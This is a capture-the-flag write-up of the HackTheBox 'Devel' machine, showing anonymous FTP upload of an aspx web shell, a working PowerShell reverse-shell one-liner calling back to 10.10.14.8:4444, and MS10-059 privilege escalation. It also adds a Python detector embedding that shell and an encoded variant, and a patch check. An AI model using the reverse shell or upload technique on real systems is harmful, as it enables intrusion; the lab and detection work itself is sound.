Devel is an easy Windows machine from HackTheBox. It requires knowledge of FTP and Windows kernel exploits to hack.
Enumeration
Nmap to start.
![](https://dylanrholloway.com/wp-content/uploads/2021/01/image-18.png)
Only ports 80 and 21 were open. Port 21 is obviously FTP and the nmap scan said anonymous access was allowed, so I started there.
![](https://dylanrholloway.com/wp-content/uploads/2021/01/image-19.png)
Foothold
The contents of the root FTP directory looked like the standard IIS root folder contents and I validated this by opening http://10.129.66.3 in a browser. Therefore I was fairly confident that if I could upload a file here I would be able to execute it from the browser, so I uploaded an aspx shell and visited the browser to check.
![](https://dylanrholloway.com/wp-content/uploads/2021/01/image-21.png)
![](https://dylanrholloway.com/wp-content/uploads/2021/01/image-22.png)
My shell was successful, so the next step was to use it to launch an interactive shell back to my terminal. I did this with the PowerShell command below:
```powershell
# Note: the quotes must be straight ASCII quotes; curly quotes copied from a web page break the command.
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.8',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```
![](https://dylanrholloway.com/wp-content/uploads/2021/01/image-23.png)
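The one-liner above is noisy from a detection standpoint: a process-creation event (Sysmon Event ID 1 or Security 4688 with command-line auditing) records `-nop`, a raw `System.Net.Sockets.TCPClient`, a `GetStream()` read loop and `iex` all in one command line, and an `-EncodedCommand` variant only hides them until the base64 is decoded. The following is an added example, not the author's code: it scores constructed command lines (the writeup's own command, an encoded variant, and two benign administrative commands) against a small indicator list; the indicator weights and alert threshold are this example's own assumptions and should be tuned against your baseline.

```python
"""Score process-creation command lines for PowerShell reverse-shell indicators.

Added example for this writeup (not the author's code). The command lines are
constructed samples of the kind found in Sysmon Event ID 1 / Security 4688
events; weights and threshold are assumptions to tune per environment.
"""
import base64
import re
from typing import Dict, List, Tuple

# (name, pattern, weight). Weights are an assumption, not a published scheme.
INDICATORS: List[Tuple[str, "re.Pattern[str]", int]] = [
    ("no-profile flag", re.compile(r"(?i)(?<![\w-])-nop(rofile)?\b"), 1),
    ("hidden window", re.compile(r"(?i)(?<![\w-])-w(indowstyle)?\s+hidden\b"), 1),
    ("raw TCP client", re.compile(r"(?i)System\.Net\.Sockets\.TCPClient"), 3),
    ("network stream loop", re.compile(r"(?i)\.GetStream\(\)"), 2),
    ("dynamic evaluation", re.compile(r"(?i)\b(iex|Invoke-Expression)\b"), 3),
    ("prompt echo", re.compile(r"\(pwd\)\.Path"), 1),
]
ALERT_THRESHOLD = 5  # assumption: tune against your own process-creation baseline

ENCODED_FLAG = re.compile(r"(?i)(?<![\w-])-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or '' if absent/invalid."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(2)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def score_command_line(cmdline: str) -> Dict[str, object]:
    """Score a command line; an encoded payload is decoded and scored together with it."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline + "\n" + decoded
    matched = [name for name, rx, _ in INDICATORS if rx.search(text)]
    score = sum(w for name, _, w in INDICATORS if name in matched)
    if decoded:
        matched.append("encoded command")
        score += 2
    return {"score": score, "indicators": matched, "alert": score >= ALERT_THRESHOLD}


def encode_for_powershell(script: str) -> str:
    """Only used here to build the constructed encoded sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed samples. REVERSE_SHELL mirrors the command line used in the writeup.
REVERSE_SHELL = (
    "powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('10.10.14.8',4444);"
    "$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};"
    "while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;"
    "$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);"
    "$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';"
    "$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);"
    "$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\""
)
ENCODED_SAMPLE = "powershell -w hidden -enc " + encode_for_powershell(
    "$c=New-Object System.Net.Sockets.TCPClient('10.10.14.8',4444);iex 'whoami'"
)
BENIGN_SAMPLES = [
    "powershell -nop -c \"Get-Service | Where-Object Status -eq Running\"",
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
]

if __name__ == "__main__":
    for sample in [REVERSE_SHELL, ENCODED_SAMPLE] + BENIGN_SAMPLES:
        result = score_command_line(sample)
        flag = "ALERT" if result["alert"] else "ok   "
        print(f"{flag} score={result['score']} {result['indicators']}")
```

Scoring several weak indicators together, rather than alerting on `-nop` alone, is what keeps the benign `Get-Service` command below the threshold while the two shell samples go well above it.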
Privilege escalation
Now that I had a foothold I started to work on privilege escalation. I used Windows Exploit Suggester (https://github.com/AonCyberLabs/Windows-Exploit-Suggester) to find any easy kernel exploits. The output is below, filtered for only exploits that allowed for privilege escalation.
![](https://dylanrholloway.com/wp-content/uploads/2021/01/image-25-1024x125.png)
I started at the top of the list and worked my way down the exploits. Eventually, I found MS10-059 worked with a pre-compiled exploit available from SecWiki (https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS10-059). I used FTP to upload the exploit to the victim machine, with the important step of first switching to binary transfer.
![](https://dylanrholloway.com/wp-content/uploads/2021/01/image-26.png)
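Windows Exploit Suggester's whole job is to compare the hotfix list in `systeminfo` output against Microsoft's bulletin database and report bulletins with no matching KB installed; the same comparison, run by an administrator over their own hosts, is a patch-compliance check. The following is an added example, not the author's code and not the tool itself: it parses a constructed `systeminfo` excerpt and reports bulletins whose fixing KB is absent. The single table entry mapping MS10-059 to KB982799 is this example's assumption and should be verified against the Microsoft bulletin; a real deployment would load the full bulletin database instead.

```python
"""Compare the hotfix list from `systeminfo` against a bulletin-to-KB table.

Added example for this writeup (not the author's code, not
Windows-Exploit-Suggester). The systeminfo text is constructed; the
MS10-059 -> KB982799 mapping is an assumption to verify against the bulletin.
"""
import re
from typing import Dict, List, Set

# Bulletin -> KB articles that fix it. Assumed single entry; extend from the
# published bulletin database rather than from memory.
PATCH_MAP: Dict[str, List[str]] = {
    "MS10-059": ["KB982799"],
}

HOTFIX_RE = re.compile(r"\[\d+\]:\s*(KB\d+)", re.IGNORECASE)
OS_NAME_RE = re.compile(r"^OS Name:\s*(.+?)\s*$", re.MULTILINE)

# Constructed systeminfo excerpt for an unpatched Windows 7 host (not real output).
UNPATCHED_SYSTEMINFO = """\
Host Name:                 WIN7-LAB
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7600 N/A Build 7600
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB2534111
                           [02]: KB976902
"""


def installed_hotfixes(systeminfo_text: str) -> Set[str]:
    """Extract KB numbers (upper-cased) from the Hotfix(s) section of systeminfo output."""
    return {kb.upper() for kb in HOTFIX_RE.findall(systeminfo_text)}


def os_name(systeminfo_text: str) -> str:
    """Return the 'OS Name:' value, or 'unknown' if the line is absent."""
    m = OS_NAME_RE.search(systeminfo_text)
    return m.group(1) if m else "unknown"


def missing_bulletins(systeminfo_text: str,
                      patch_map: Dict[str, List[str]] = PATCH_MAP) -> List[str]:
    """Return bulletins for which none of the fixing KBs is installed (sorted for stable output)."""
    present = installed_hotfixes(systeminfo_text)
    return sorted(
        bulletin for bulletin, kbs in patch_map.items()
        if not any(kb.upper() in present for kb in kbs)
    )


if __name__ == "__main__":
    print(f"Host OS: {os_name(UNPATCHED_SYSTEMINFO)}")
    print(f"Installed hotfixes: {sorted(installed_hotfixes(UNPATCHED_SYSTEMINFO))}")
    for bulletin in missing_bulletins(UNPATCHED_SYSTEMINFO):
        print(f"MISSING {bulletin}: install one of {PATCH_MAP[bulletin]}")
```

The check is only as good as its table: a host that has a superseding cumulative update but not the original KB would be reported as missing unless the table also lists the superseding articles, which is exactly why the real tool works from the full bulletin database.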
From my low privilege shell I executed the exploit to spawn a privileged shell back to my Kali machine.
![](https://dylanrholloway.com/wp-content/uploads/2021/01/image-27.png)